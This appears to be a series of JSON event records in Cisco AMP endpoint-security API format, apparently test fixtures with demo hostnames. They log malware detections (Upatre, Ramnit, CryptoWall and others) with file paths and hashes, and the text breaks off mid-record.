-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659316446265000,"timestamp":1610704832,"timestamp_nanoseconds":835000000,"date":"2021-01-15T10:00:32+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"5826659316446265345","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":80,"local_ip":"10.10.0.0","local_port":1093,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":2800,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"814a37d89a79aa3975308e723bc1a3a67360323b7e3584de00896fe7c59bbb8e","sha1":"58e80c90bf54850b5f3ccbd8edf0877537e0ea8e","md5":"55794b97a7faabd2910873c85274f409"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":918000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":902000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704198","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":871000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":824000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704197","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"},"parent":{"process_id":2492,"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":793000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704196","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254677789704000,"timestamp":1610704832,"timestamp_nanoseconds":684000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254677789704195","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":704000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594701","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":611000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594700","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"iiwswemtokwvoomr.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\iiwswemtokwvoomr.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":3996,"disposition":"Malicious","file_name":"Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663803156595000,"timestamp":1610704832,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:00:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663803156594699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707312705798000,"timestamp":1610704830,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:00:30+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1264,"scanned_processes":21,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899742001000,"timestamp":1610704828,"timestamp_nanoseconds":742000000,"date":"2021-01-15T10:00:28+00:00","event_type":"Microsoft Word compromise","event_type_id":1107296262,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610704828,"start_date":"2021-01-15T10:00:28+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_CryptoWall","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"ce:32:02:72:9b:c8"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"caee8a2c599ad6e46ffdec5fabadc438af5c2ae5266d2c1e120269fffda6e426"},"parent":{"disposition":"Clean","identity":{"sha256":"b4234acf96fbe0e0feca317a1928afac05105b73556990d89f8a18563e1a3c65"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":589000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6180331452157132817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":495000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132816","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":339000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132815","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":324000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132814","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132813","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132812","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132811","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":246000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6180331452157132810","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":168000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win.Trojan.Upatre.tht.VRT","detection_id":"6180331452157132809","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"opticare.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\opticare.exe","identity":{"sha256":"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc","sha1":"f9b02ad8d25157eebdb284631ff646316dc606d5","md5":"b2e15a06b0cca8a926c94f8a8eae3d88"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180331452157133000,"timestamp":1610704827,"timestamp_nanoseconds":121000000,"date":"2021-01-15T10:00:27+00:00","event_type":"Threat 